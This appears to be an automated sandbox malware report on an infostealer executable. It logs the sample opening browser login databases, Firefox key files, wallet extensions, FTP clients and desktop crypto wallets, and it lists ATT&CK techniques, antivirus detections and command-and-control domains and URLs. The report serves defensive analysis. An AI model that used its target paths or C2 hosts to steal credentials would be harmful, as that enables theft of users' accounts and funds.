                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: Yara matchFile source: 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2183284410.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2155738862.0000000001745000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2184825039.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2183365042.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2183995653.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2183909532.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2184609958.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2183070027.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2184342033.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2120532040.0000000001745000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2182875665.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2184473776.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2156261014.0000000001745000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2183708520.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2184119723.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2184213865.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2183174320.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2183492043.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2184688562.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2183790933.000000000173F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2876, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2876, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Process Injection
                LSASS Memory761
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe39%ReversingLabsWin32.Trojan.Symmi
                file.exe100%AviraTR/Crypt.XPACK.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://atten-supporse.bz/0%Avira URL Cloudsafe
                https://atten-supporse.biz:443/api://%ProgramFiles%100%Avira URL Cloudmalware
                https://atten-supporse.biz/744-1-2100%Avira URL Cloudmalware
                https://atten-supporse.biz/api1100%Avira URL Cloudmalware
                https://atten-supporse.biz:443/apiUU2100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                atten-supporse.biz
                104.21.48.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  dare-curbys.bizfalse
                    high
                    impend-differ.bizfalse
                      high
                      covery-mover.bizfalse
                        high
                        https://atten-supporse.biz/apifalse
                          high
                          dwell-exclaim.bizfalse
                            high
                            zinc-sneark.bizfalse
                              high
                              formy-spill.bizfalse
                                high
                                atten-supporse.bizfalse
                                  high
                                  se-blurry.bizfalse
                                    high
                                    print-vexer.bizfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://atten-supporse.biz:443/apiUU2file.exe, 00000000.00000003.2206119101.0000000001746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205795166.0000000001743000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://atten-supporse.bz/file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270461946.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271651117.0000000001759000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://atten-supporse.biz/744-1-2file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155726723.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156002703.0000000005F05000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.c.lencr.org/0file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://x1.i.lencr.org/0file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://atten-supporse.biz/api1file.exe, 00000000.00000003.2155923363.0000000005F91000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155687834.0000000005F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://atten-supporse.biz/apiqfile.exe, 00000000.00000003.2268418527.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://atten-supporse.biz/file.exe, 00000000.00000003.2182636738.0000000005F7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183056768.0000000005F81000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2268418527.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205721535.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155923363.0000000005F91000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155687834.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://atten-supporse.biz/apisfile.exe, 00000000.00000003.2268418527.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://atten-supporse.biz:443/api://%ProgramFiles%file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  104.21.48.1
                                                                                  atten-supporse.bizUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1571961
                                                                                  Start date and time:2024-12-09 22:34:07 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 5m 0s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:4
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:file.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:Failed
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
